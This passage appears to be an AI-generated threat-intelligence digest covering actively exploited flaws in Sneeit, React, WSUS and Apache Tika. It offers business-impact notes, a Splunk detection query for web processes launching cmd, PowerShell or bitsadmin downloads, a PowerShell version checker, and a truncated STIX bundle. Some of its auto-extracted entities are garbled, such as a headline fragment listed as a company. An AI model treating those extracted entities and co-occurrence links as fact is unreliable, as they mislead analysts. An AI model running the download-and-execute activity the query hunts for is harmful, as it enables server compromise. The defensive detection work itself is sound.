Attackers are actively exploiting a critical Remote Code Execution (RCE) flaw in the Sneeit Framework WordPress plugin (versions ā¤ 8.3). This allows unauthenticated actors to take complete control of affected websites.
Business impact
Full compromise of web presence leads to immediate reputational damage, SEO poisoning, potential customer data theft, and regulatory fines under SOX/GDPR if PII is exposed.
Recommended action
Ask your Web/Marketing team: "Are we running the Sneeit Framework plugin, and have we verified it is updated to version 8.4 or higher immediately?"
Threat actors have significantly ramped up attacks targeting the React vulnerability CVE-2025-55182, known as "React2Shell." This flaw in the popular JavaScript library allows for remote command execution on servers hosting vulnerable applications.
Business impact
Successful exploitation allows attackers to bypass perimeter defenses and execute arbitrary code, leading to service disruption, data exfiltration, and potential lateral movement within the corporate network.
Recommended action
Ask your AppSec team: "Have we scanned our external-facing applications for CVE-2025-55182 and applied the necessary React patches?"
The ShadowPad malware campaign is now leveraging a Remote Code Execution vulnerability in Windows Server Update Services (WSUS). By compromising the update mechanism, attackers can distribute malware to all endpoints managed by the infected server.
Business impact
A compromised WSUS server acts as a trusted internal distribution point for malware, potentially infecting the entire server fleet simultaneously, causing catastrophic operational paralysis.
Recommended action
Ask your Infrastructure team: "Is our WSUS server patched against CVE-2025-59287, and are we monitoring for anomalous outbound connections from the update server?"
A critical vulnerability in Apache Tika allows attackers to perform XML External Entity (XXE) injection attacks using crafted XFA files embedded within PDFs. This affects systems that automatically process or index documents.
Business impact
Exploitation can lead to the theft of internal files, server-side request forgery (SSRF) against internal infrastructure, and denial of service, disrupting document management workflows.
Recommended action
Ask your Development team: "Do our applications use Apache Tika for document processing, and have we disabled external entity processing or updated to the fixed version?"
Hundreds of Porsche vehicles in Russia were rendered undrivable due to a malfunction in their factory-installed satellite security systems. This highlights the critical dependency on centralized IoT infrastructure for physical asset operation.
Business impact
For automotive and IoT-dependent businesses, this represents a direct revenue loss, massive customer dissatisfaction, and potential liability for bricked assets.
Recommended action
Ask your Product team: "Do our connected products have a fail-safe mode that allows basic operation if the central security server or satellite link fails?"
The US Treasury reports that ransomware payments have hit a historic high, with over $1.1 billion paid in 2023 alone across 1,512 incidents. This confirms ransomware remains a highly profitable and growing industry.
Business impact
Organizations must anticipate higher cyber insurance premiums and stricter coverage requirements. The financial risk of a breach now extends beyond recovery costs to massive extortion demands.
Recommended action
Ask your CISO: "Does our current cyber insurance policy cover ransom payments at these elevated market rates, and have we tested our ability to restore from backups without paying?"
The Iranian threat group MuddyWater is utilizing a new backdoor named "UDPGangster" that uses the UDP protocol for command-and-control, specifically targeting entities in Turkey, Israel, and Azerbaijan.
Business impact
Espionage and persistent access by state-sponsored actors can lead to intellectual property theft and long-term strategic compromise.
Recommended action
Ask your SOC: "Are we monitoring UDP traffic for anomalous patterns, specifically to known MuddyWater infrastructure or non-standard ports?"
A former employee has launched a class-action lawsuit against The Washington Post following a data breach involving Oracle E-Business Suite (EBS) vulnerabilities that compromised 9,700 records.
Business impact
This illustrates the long-tail financial and legal liability of unpatched ERP systems, including class-action defense costs and settlements.
Recommended action
Ask your ERP team: "When was the last time we audited our Oracle EBS environment for known vulnerabilities, and is it segmented from the public internet?"
New versions of Android malware families FvncBot, SeedSnatcher, and ClayRat have been detected with enhanced data theft capabilities, masquerading as security updates or legitimate apps.
Business impact
Mobile malware compromises user credentials and 2FA tokens, bypassing authentication controls for corporate access and banking.
Recommended action
Ask your Mobile Device Management (MDM) team: "Do we enforce a policy that prevents the installation of apps from unknown sources on corporate-managed Android devices?"
CISA has issued new guidance for integrating Artificial Intelligence into Operational Technology (OT) environments, focusing on governance, behavioral analytics, and safety risks.
Business impact
Failure to adhere to these guidelines could result in regulatory scrutiny and increased safety risks as AI is adopted in industrial control systems.
Recommended action
Ask your OT Security lead: "Have we reviewed the new CISA guidance for our AI-driven industrial processes?"
Portugal has updated its cybercrime laws to provide exemptions for security researchers, potentially encouraging responsible disclosure but also changing the legal landscape for unauthorized testing.
With the Security Affairs newsletter highlighting a dual campaign targeting GlobalProtect VPNs and MuddyWater leveraging UDP backdoors, Palo Alto Networks provides critical visibility. Their App-ID technology can distinguish legitimate UDP traffic from the "UDPGangster" C2 channels, and their Threat Prevention signatures are essential for blocking the specific exploits targeting VPN gateways.
Actionable Platform Guidance: Ensure "Strict" profile is applied to GlobalProtect interfaces. Enable App-ID for all UDP traffic to identify unknown applications tunneling over UDP. Review Threat Monitor for "GlobalProtect" related alerts immediately.
index=security sourcetype="win:iis" OR sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
(process_name="w3wp.exe" OR process_name="wsus.exe")
(command_line="*cmd.exe*" OR command_line="*powershell*" OR command_line="*bitsadmin*")
| eval risk_score=case(
match(command_line, "(?i)download"), 100,
match(command_line, "(?i)invoke-expression"), 90,
1==1, 50)
| where risk_score >= 50
| table _time, src_ip, dest_ip, process_name, command_line, risk_score
| sort -_time
4. PowerShell Script ā Check Sneeit Plugin Version
$wpPath = "C:\inetpub\wwwroot\wp-content\plugins\sneeit-framework"
$computers = "localhost", "WEB01", "WEB02"
foreach ($computer in $computers) {
if (Test-Connection -ComputerName $computer -Count 1 -Quiet) {
Invoke-Command -ComputerName $computer -ScriptBlock {
param($path)
if (Test-Path $path) {
$content = Get-Content "$path\sneeit-framework.php" -ErrorAction SilentlyContinue | Select-String "Version:"
Write-Host "[ALERT] Sneeit Framework found on $env:COMPUTERNAME: $content"
} else {
Write-Host "[OK] Sneeit Framework not found on $env:COMPUTERNAME"
}
} -ArgumentList $wpPath
}
}
This rundown should provide a solid overview of the current threat landscape. Thank you to all our cyberheroes for your diligence and hard work. Stay vigilant!
Cookie Notice
We use essential cookies to provide our cybersecurity newsletter service and analytics cookies to improve your experience. We respect your privacy and comply with GDPR requirements.
About STIX 2.1: Structured Threat Information eXpression (STIX) is the machine language of cybersecurity. This bundle contains validated threat objects, indicators, and relationships that can be directly imported into your SIEM, TIP, or security orchestration platform.
Usage: Download or copy the JSON below and import it directly into your threat intelligence platform, SIEM, or security orchestration tools for automated threat detection and response.
{
"type": "bundle",
"id": "bundle--06386f17-b9ea-40c0-9399-a7e91c426bae",
"objects": [
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487",
"created": "2022-10-01T00:00:00.000Z",
"definition_type": "tlp:2.0",
"name": "TLP:CLEAR",
"definition": {
"tlp": "clear"
}
},
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--d56430c9-6bf1-44b0-9b95-c1cbaf661923",
"created": "2025-12-08T13:54:59.239Z",
"modified": "2025-12-08T13:54:59.239Z",
"name": "MikeGPT Intelligence Platform",
"description": "AI-powered threat intelligence collection and analysis platform providing automated cybersecurity intelligence feeds",
"identity_class": "organization",
"sectors": [
"technology",
"defense"
],
"contact_information": "Website: https://mikegptai.com | Email: intel@mikegptai.com",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--9d3fc3b9-b6a4-4e77-87b1-c0ba1fb50cb7",
"created": "2025-12-08T13:54:59.239Z",
"modified": "2025-12-08T13:54:59.239Z",
"name": "Threat Intelligence Report - 2025-12-08",
"description": "Threat Intelligence Report - 2025-12-08\n\nThis report consolidates actionable cybersecurity intelligence from 58 sources, processed through automated threat analysis and relationship extraction.\n\nKEY FINDINGS:\nā¢ Sneeit WordPress RCE Exploited in the Wild While ICTBroadcast Bug Fuels Frost Botnet Attacks (Score: 100)\nā¢ Exploitation of React2Shell Surges (Score: 100)\nā¢ U.S. CISA adds a Meta React Server Components flaw to its Known Exploited Vulnerabilities catalog (Score: 100)\nā¢ Ex-Employee Sues Washington Post Over Oracle EBS-Related Data Breach (Score: 100)\nā¢ SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 74 (Score: 100)\n\nEXTRACTED ENTITIES:\nā¢ 14 Attack Pattern(s)\nā¢ 1 Marking Definition(s)\nā¢ 14 Relationship(s)\nā¢ 1 Threat Actor(s)\nā¢ 2 Tool(s)\nā¢ 3 Vulnerability(s)\n\nCONFIDENCE ASSESSMENT:\nVariable confidence scoring applied based on entity type and intelligence source reliability. Confidence ranges from 30-95% reflecting professional intelligence assessment practices.\n\nGENERATION METADATA:\n- Processing Time: Automated\n- Validation: Three-LLM consensus committee\n- Standards Compliance: STIX 2.1\n",
"published": "2025-12-08T13:54:59.239Z",
"object_refs": [
"identity--d56430c9-6bf1-44b0-9b95-c1cbaf661923",
"vulnerability--09cfd756-732a-426d-8c11-8d9ddb3e9e05",
"identity--53a6e913-b371-4d86-baa7-f737222b3ce5",
"vulnerability--2602bc7a-afdf-4d1b-b016-14b0b2cc89d1",
"tool--3e383063-6bd8-4128-9ad6-93694ac0c723",
"vulnerability--df419c93-abc3-45d0-b742-594b93007e35",
"identity--8c780a2d-c2e1-4081-a002-eb0698c76ec2",
"tool--aa07bb34-c394-4745-a8fa-8fc216c808a9",
"identity--36805c2f-2e9f-4e29-9280-8a4aa9965a83",
"identity--cf27a276-b4e7-47de-b29f-71fd1a069c58",
"identity--eeecdab8-dfb0-43da-b416-a0f521113cba",
"threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"identity--f5741dce-fb19-40d5-9ed4-c314379276be",
"attack-pattern--280ebd89-59bc-4ae2-a9db-1c01a56e50dc",
"attack-pattern--e5974f70-5745-450a-908a-6483ad9c4678",
"attack-pattern--771ed4e5-6dde-43a8-9c72-d006b0c83e3d",
"attack-pattern--13fc9cbe-9444-4eba-872b-a44565ae3ab7",
"attack-pattern--ce39e6f2-b20f-421e-83e1-242a773e1927",
"attack-pattern--d5229cf6-f11b-41bc-8aca-0df713047400",
"attack-pattern--4a2578d4-fdf6-48d3-b66a-93c681e1e21e",
"attack-pattern--68a5c7b8-09b4-49b1-8149-bc23ed0260c9",
"attack-pattern--06cf8802-38e4-4421-a699-33a0bae74d96",
"attack-pattern--2e52cc86-c2ef-43d7-9f1e-2fc59c4845ee",
"attack-pattern--943edc6f-c0f9-48f1-b8d4-4666aa0abae1",
"attack-pattern--12a5aa0e-cd1f-4614-97d0-872085aa494b",
"attack-pattern--d2a77ce3-d278-4f77-97f0-227b744a33d3",
"attack-pattern--27b36b6d-ae90-4767-b07a-563ecef589ea",
"relationship--e9f7f400-7343-4f4c-b1f7-1b243b366842",
"relationship--46cd00ec-6ce0-4a79-a1ec-7fa01bc57d3e",
"relationship--655b3935-b3e7-47bd-bcf0-b2e168687c59",
"relationship--f7a31206-4513-420a-ad4c-686d6045b5ad",
"relationship--ea4f3740-3edf-4a49-b4ff-cec4313ccc87",
"relationship--45fe84ee-efbe-4421-bb01-e6d6641f64f8",
"relationship--d5e1003d-1187-486a-9a30-ab8e28d6248a",
"relationship--334da1c4-6e96-4dfb-a37f-984be7b542d9",
"relationship--33c60d98-4dad-4c7a-8872-61ab39baa8f3",
"relationship--eb4226af-9bb3-4855-931d-5d44d13c87bb",
"relationship--07b73f78-11ff-4e5e-8f6f-f1dec9870e28",
"relationship--8d8423e2-43b6-42fa-ac15-447aa227ccae",
"relationship--1e041532-9123-49fd-8932-0d4ac5538268",
"relationship--f41170b8-68af-413c-99d6-303751d2d9b1"
],
"labels": [
"threat-report",
"threat-intelligence"
],
"created_by_ref": "identity--d56430c9-6bf1-44b0-9b95-c1cbaf661923",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.235Z",
"modified": "2025-12-08T13:54:59.235Z",
"confidence": 95,
"type": "vulnerability",
"id": "vulnerability--09cfd756-732a-426d-8c11-8d9ddb3e9e05",
"name": "CVE-2025-55182",
"description": "A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.. CVSS Score: 10.0 (CRITICAL). CISA KEV: Active exploitation confirmed. EPSS: 27.2% exploitation probability",
"x_cvss_score": 10.0,
"x_cvss_severity": "CRITICAL",
"x_kev_status": true,
"x_epss_score": 0.27191,
"external_references": [
{
"source_name": "cve",
"external_id": "CVE-2025-55182",
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55182"
},
{
"source_name": "nvd",
"external_id": "CVE-2025-55182",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55182"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"vulnerability"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "identity",
"id": "identity--53a6e913-b371-4d86-baa7-f737222b3ce5",
"name": "SecurityWeek",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "SecurityWeek is a cybersecurity news and information website that provides in-depth analysis and coverage of the latest threats, vulnerabilities, and industry trends.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "vulnerability",
"id": "vulnerability--2602bc7a-afdf-4d1b-b016-14b0b2cc89d1",
"name": "CVE-2025-59287",
"description": "Deserialization of untrusted data in Windows Server Update Service allows an unauthorized attacker to execute code over a network.. CVSS Score: 9.8 (CRITICAL). CISA KEV: Active exploitation confirmed. EPSS: 62.3% exploitation probability",
"x_cvss_score": 9.8,
"x_cvss_severity": "CRITICAL",
"x_kev_status": true,
"x_epss_score": 0.6231,
"external_references": [
{
"source_name": "cve",
"external_id": "CVE-2025-59287",
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59287"
},
{
"source_name": "nvd",
"external_id": "CVE-2025-59287",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59287"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"vulnerability"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "tool",
"id": "tool--3e383063-6bd8-4128-9ad6-93694ac0c723",
"name": "Wordfence",
"tool_types": [
"unknown"
],
"labels": [
"tool"
],
"description": "Wordfence is a security plugin for WordPress that provides protection against malware, viruses, and other online threats through firewall rules, malware scanning, and login security features.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "vulnerability",
"id": "vulnerability--df419c93-abc3-45d0-b742-594b93007e35",
"name": "CVE-2025-6389",
"description": "The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.3 via the sneeit_articles_pagination_callback() function. This is due to the function accepting user input and then passing that through call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leveraged to inject backdoors or, for example, create new administrative user accounts.. CVSS Score: 9.8 (CRITICAL). EPSS: 0.3% exploitation probability",
"x_cvss_score": 9.8,
"x_cvss_severity": "CRITICAL",
"x_kev_status": false,
"x_epss_score": 0.00335,
"external_references": [
{
"source_name": "cve",
"external_id": "CVE-2025-6389",
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6389"
},
{
"source_name": "nvd",
"external_id": "CVE-2025-6389",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6389"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"vulnerability"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "identity",
"id": "identity--8c780a2d-c2e1-4081-a002-eb0698c76ec2",
"name": "Infrastructure Security Agency",
"identity_class": "organization",
"labels": [
"organization"
],
"description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is a federal agency responsible for protecting the United States' critical infrastructure from cybersecurity threats. It is a key player in the nation's cybersecurity efforts and provides various resources and guidelines for organizations to improve their cybersecurity posture.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "tool",
"id": "tool--aa07bb34-c394-4745-a8fa-8fc216c808a9",
"name": "GlobalProtect",
"tool_types": [
"unknown"
],
"labels": [
"tool"
],
"description": "GlobalProtect is a network security solution that provides secure remote access to a company's network by establishing a virtual private network (VPN) connection.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "identity",
"id": "identity--36805c2f-2e9f-4e29-9280-8a4aa9965a83",
"name": "CYFIRMA",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "CYFIRMA is a threat intelligence platform that provides real-time insights into an organization's attack surface and potential cyber threats.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "identity",
"id": "identity--cf27a276-b4e7-47de-b29f-71fd1a069c58",
"name": "Zimperium",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Zimperium is a mobile security company that provides on-device threat detection and protection for mobile devices.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "identity",
"id": "identity--eeecdab8-dfb0-43da-b416-a0f521113cba",
"name": "Critical Apache Tika Vulnerability Leads",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Critical Apache Tika Vulnerability Leads is a company.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "threat-actor",
"id": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"name": "MuddyWater",
"threat_actor_types": [
"hacker"
],
"labels": [
"threat-actor"
],
"description": "MuddyWater is an Iranian state-sponsored hacking group known for conducting cyber espionage and cyber attacks on various targets, including government and private sector organizations. They have been observed using various tactics, techniques, and procedures (TTPs) to compromise their targets, including the use of custom-made malware and tools.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "identity",
"id": "identity--f5741dce-fb19-40d5-9ed4-c314379276be",
"name": "Tri-Century Eye Care",
"identity_class": "organization",
"labels": [
"organization"
],
"description": "Tri-Century Eye Care is a healthcare organization that was recently targeted by the Pear ransomware group, resulting in a significant data breach. The organization provides eye care services and was impacted by the ransomware attack, which led to the theft of over 3 Tb of data.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--280ebd89-59bc-4ae2-a9db-1c01a56e50dc",
"name": "Exploit Public-Facing Application",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access"
}
],
"x_mitre_id": "T1190",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1190/",
"external_id": "T1190"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--e5974f70-5745-450a-908a-6483ad9c4678",
"name": "Exploitation for Client Execution",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"x_mitre_id": "T1203",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1203/",
"external_id": "T1203"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--771ed4e5-6dde-43a8-9c72-d006b0c83e3d",
"name": "Command and Scripting Interpreter",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"x_mitre_id": "T1059",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1059/",
"external_id": "T1059"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--13fc9cbe-9444-4eba-872b-a44565ae3ab7",
"name": "Supply Chain Compromise",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access"
}
],
"x_mitre_id": "T1195",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1195/",
"external_id": "T1195"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--ce39e6f2-b20f-421e-83e1-242a773e1927",
"name": "Create or Modify System Process",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"x_mitre_id": "T1543",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1543/",
"external_id": "T1543"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--d5229cf6-f11b-41bc-8aca-0df713047400",
"name": "Boot or Logon Autostart Execution",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"x_mitre_id": "T1547",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1547/",
"external_id": "T1547"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--4a2578d4-fdf6-48d3-b66a-93c681e1e21e",
"name": "Application Layer Protocol",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control"
}
],
"x_mitre_id": "T1071",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1071/",
"external_id": "T1071"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--68a5c7b8-09b4-49b1-8149-bc23ed0260c9",
"name": "Non-Application Layer Protocol",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control"
}
],
"x_mitre_id": "T1095",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1095/",
"external_id": "T1095"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--06cf8802-38e4-4421-a699-33a0bae74d96",
"name": "System Information Discovery",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"x_mitre_id": "T1082",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1082/",
"external_id": "T1082"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--2e52cc86-c2ef-43d7-9f1e-2fc59c4845ee",
"name": "File and Directory Discovery",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"x_mitre_id": "T1083",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1083/",
"external_id": "T1083"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--943edc6f-c0f9-48f1-b8d4-4666aa0abae1",
"name": "Process Discovery",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"x_mitre_id": "T1057",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1057/",
"external_id": "T1057"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 70,
"type": "attack-pattern",
"id": "attack-pattern--12a5aa0e-cd1f-4614-97d0-872085aa494b",
"name": "Exploitation of Remote Services",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement"
}
],
"x_mitre_id": "T1210",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1210/",
"external_id": "T1210"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 70,
"type": "attack-pattern",
"id": "attack-pattern--d2a77ce3-d278-4f77-97f0-227b744a33d3",
"name": "Archive via Utility",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "collection"
}
],
"x_mitre_id": "T1560.001",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1560/001/",
"external_id": "T1560.001"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 70,
"type": "attack-pattern",
"id": "attack-pattern--27b36b6d-ae90-4767-b07a-563ecef589ea",
"name": "Scheduled Task",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"x_mitre_id": "T1053.005",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1053/005/",
"external_id": "T1053.005"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--e9f7f400-7343-4f4c-b1f7-1b243b366842",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--280ebd89-59bc-4ae2-a9db-1c01a56e50dc",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Exploit Public-Facing Application (T1190) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--46cd00ec-6ce0-4a79-a1ec-7fa01bc57d3e",
